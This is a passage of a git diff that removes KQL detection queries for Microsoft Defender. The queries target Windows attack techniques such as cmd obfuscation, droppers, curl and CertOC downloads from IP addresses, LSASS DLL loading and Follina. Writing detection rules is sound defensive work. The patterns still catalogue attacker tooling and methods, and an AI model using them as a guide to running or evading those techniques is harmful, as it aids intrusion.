-// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
-This could be a sign of obfuscation of a fat finger problem (typo by the developer).
-
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe/c" or ProcessCommandLine contains "\\cmd/c" or ProcessCommandLine contains "\"cmd/c" or ProcessCommandLine contains "cmd.exe/k" or ProcessCommandLine contains "\\cmd/k" or ProcessCommandLine contains "\"cmd/k" or ProcessCommandLine contains "cmd.exe/r" or ProcessCommandLine contains "\\cmd/r" or ProcessCommandLine contains "\"cmd/r") or (ProcessCommandLine contains "/cwhoami" or ProcessCommandLine contains "/cpowershell" or ProcessCommandLine contains "/cschtasks" or ProcessCommandLine contains "/cbitsadmin" or ProcessCommandLine contains "/ccertutil" or ProcessCommandLine contains "/kwhoami" or ProcessCommandLine contains "/kpowershell" or ProcessCommandLine contains "/kschtasks" or ProcessCommandLine contains "/kbitsadmin" or ProcessCommandLine contains "/kcertutil") or (ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /r")) and (not(((ProcessCommandLine in~ ("cmd.exe /c") or ProcessCommandLine contains "AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules" or ProcessCommandLine endswith "cmd.exe/c .") or (ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /r "))))
\ No newline at end of file
diff --git a/Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql b/Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql
deleted file mode 100644
index fb202cf7..00000000
--- a/Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
-// Tags: attack.execution, attack.command_and_control, attack.t1059.003, attack.t1059.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "://" and ProcessCommandLine contains "%AppData%") and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/Execution/Computer_Password_Change_Via_Ksetup.EXE.kql b/Execution/Computer_Password_Change_Via_Ksetup.EXE.kql
deleted file mode 100644
index 5ca60a02..00000000
--- a/Execution/Computer_Password_Change_Via_Ksetup.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/06
-// Level: medium
-// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe"
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains " /setcomputerpassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 3aa4acf8..00000000
--- a/Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/08
-// Level: medium
-// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
-// Tags: attack.discovery, attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Conhost.exe_CommandLine_Path_Traversal.kql b/Execution/Conhost.exe_CommandLine_Path_Traversal.kql
deleted file mode 100644
index f38d94ed..00000000
--- a/Execution/Conhost.exe_CommandLine_Path_Traversal.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/14
-// Level: high
-// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "/../../" and InitiatingProcessCommandLine contains "conhost"
\ No newline at end of file
diff --git a/Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql b/Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql
deleted file mode 100644
index bf76ea86..00000000
--- a/Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/28
-// Level: medium
-// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\conhost.exe" and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\userinit.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe")) and (not((InitiatingProcessCommandLine contains "-k apphost -s AppHostSvc" or InitiatingProcessCommandLine contains "-k imgsvc" or InitiatingProcessCommandLine contains "-k localService -p -s RemoteRegistry" or InitiatingProcessCommandLine contains "-k LocalSystemNetworkRestricted -p -s NgcSvc" or InitiatingProcessCommandLine contains "-k NetSvcs -p -s NcaSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s NetSetupSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s wlidsvc" or InitiatingProcessCommandLine contains "-k NetworkService -p -s DoSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s AppXSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s ClipSVC"))) and (not((InitiatingProcessCommandLine contains "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessCommandLine contains "C:\\Program Files\\Dropbox\\Client\\")))
\ No newline at end of file
diff --git a/Execution/Control_Panel_Items.kql b/Execution/Control_Panel_Items.kql
deleted file mode 100644
index de98b896..00000000
--- a/Execution/Control_Panel_Items.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/06/22
-// Level: high
-// Description: Detects the malicious use of a control panel item
-// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql b/Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql
deleted file mode 100644
index 1f4c9f72..00000000
--- a/Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: medium
-// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Created_Files_by_Microsoft_Sync_Center.kql b/Execution/Created_Files_by_Microsoft_Sync_Center.kql
deleted file mode 100644
index ef6299fb..00000000
--- a/Execution/Created_Files_by_Microsoft_Sync_Center.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql b/Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql
deleted file mode 100644
index 544ae6eb..00000000
--- a/Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019/02/11
-// Level: high
-// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense_evasion, attack.t1218.005, attack.t1027.004
-DeviceProcessEvents
-| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains 
":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql b/Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql
deleted file mode 100644
index 62a6d145..00000000
--- a/Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: medium
-// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "User-Agent:" and ProcessCommandLine matches regex "\\s-H\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/DLL_Load_via_LSASS.kql b/Execution/DLL_Load_via_LSASS.kql
deleted file mode 100644
index 0cc97026..00000000
--- a/Execution/DLL_Load_via_LSASS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/16
-// Level: high
-// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
-// Tags: attack.execution, attack.persistence, attack.t1547.008
-DeviceRegistryEvents
-| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe")))
\ No newline at end of file
diff --git a/Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql b/Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql
deleted file mode 100644
index 42c5fde8..00000000
--- a/Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.community
-// Date: 2020/10/10
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe")))
\ No newline at end of file
diff --git a/Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql b/Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql
deleted file mode 100644
index 4a2e8091..00000000
--- a/Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: bartblaze
-// Date: 2020/07/13
-// Level: medium
-// Description: Detects dllhost initiating a network connection to a non-local IP address.
-Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.
-An initial baseline is recommended before deployment.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.execution, attack.t1559.001
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")))))
\ No newline at end of file
diff --git a/Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql b/Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql
deleted file mode 100644
index 5eda2d31..00000000
--- a/Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: medium
-// Description: Detects any assembly DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath startswith "C:\\Windows\\assembly\\" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql b/Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql
deleted file mode 100644
index 5f8aed77..00000000
--- a/Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72, oscd.community
-// Date: 2020/10/14
-// Level: high
-// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
-// Tags: attack.execution, attack.privilege_escalation, attack.t1055
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql b/Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql
deleted file mode 100644
index 5c3a7ad7..00000000
--- a/Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/26
-// Level: medium
-// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
-// Tags: attack.execution, attack.t1559.002
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLaunch" or RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLookup")) or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Word\\Security\\AllowDDE")
\ No newline at end of file
diff --git a/Execution/Exchange_PowerShell_Snap-Ins_Usage.kql b/Execution/Exchange_PowerShell_Snap-Ins_Usage.kql
deleted file mode 100644
index 32eb0763..00000000
--- a/Execution/Exchange_PowerShell_Snap-Ins_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/03/03
-// Level: high
-// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
-// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe")))
\ No newline at end of file
diff --git a/Execution/Execute_Code_with_Pester.bat.kql b/Execution/Execute_Code_with_Pester.bat.kql
deleted file mode 100644
index 0676e78a..00000000
--- a/Execution/Execute_Code_with_Pester.bat.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/08
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?"))
\ No newline at end of file
diff --git a/Execution/Execute_Code_with_Pester.bat_as_Parent.kql b/Execution/Execute_Code_with_Pester.bat_as_Parent.kql
deleted file mode 100644
index 7a116895..00000000
--- a/Execution/Execute_Code_with_Pester.bat_as_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/20
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Execution/Execute_MSDT_Via_Answer_File.kql b/Execution/Execute_MSDT_Via_Answer_File.kql
deleted file mode 100644
index 3ce729d9..00000000
--- a/Execution/Execute_MSDT_Via_Answer_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af ") and (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and FolderPath endswith "\\msdt.exe")) and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe"))
\ No newline at end of file
diff --git a/Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql b/Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql
deleted file mode 100644
index b385a85e..00000000
--- a/Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Execution/Execution_of_Powershell_Script_in_Public_Folder.kql b/Execution/Execution_of_Powershell_Script_in_Public_Folder.kql
deleted file mode 100644
index b8a0887b..00000000
--- a/Execution/Execution_of_Powershell_Script_in_Public_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/04/06
-// Level: high
-// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-f C:\\Users\\Public" or ProcessCommandLine contains "-f \"C:\\Users\\Public" or ProcessCommandLine contains "-f %Public%" or ProcessCommandLine contains "-fi C:\\Users\\Public" or ProcessCommandLine contains "-fi \"C:\\Users\\Public" or ProcessCommandLine contains "-fi %Public%" or ProcessCommandLine contains "-fil C:\\Users\\Public" or ProcessCommandLine contains "-fil \"C:\\Users\\Public" or ProcessCommandLine contains "-fil %Public%" or ProcessCommandLine contains "-file C:\\Users\\Public" or ProcessCommandLine contains "-file \"C:\\Users\\Public" or ProcessCommandLine contains "-file %Public%") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Execution/File_Decryption_Using_Gpg4win.kql b/Execution/File_Decryption_Using_Gpg4win.kql
deleted file mode 100644
index f709dd6a..00000000
--- a/Execution/File_Decryption_Using_Gpg4win.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/09
-// Level: medium
-// Description: Detects usage of Gpg4win to decrypt files
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool")
\ No newline at end of file
diff --git a/Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql b/Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql
deleted file mode 100644
index 21f09ae9..00000000
--- a/Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/10/18
-// Level: high
-// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe
-// Tags: attack.command_and_control, attack.execution, attack.t1105
-DeviceProcessEvents
-| where ProcessCommandLine contains "-GetCACAPS" and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql b/Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql
deleted file mode 100644
index 83ae871e..00000000
--- a/Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/10/18
-// Level: medium
-// Description: Detects file downloads directly from IP address URL using curl.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}") and (not((ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith 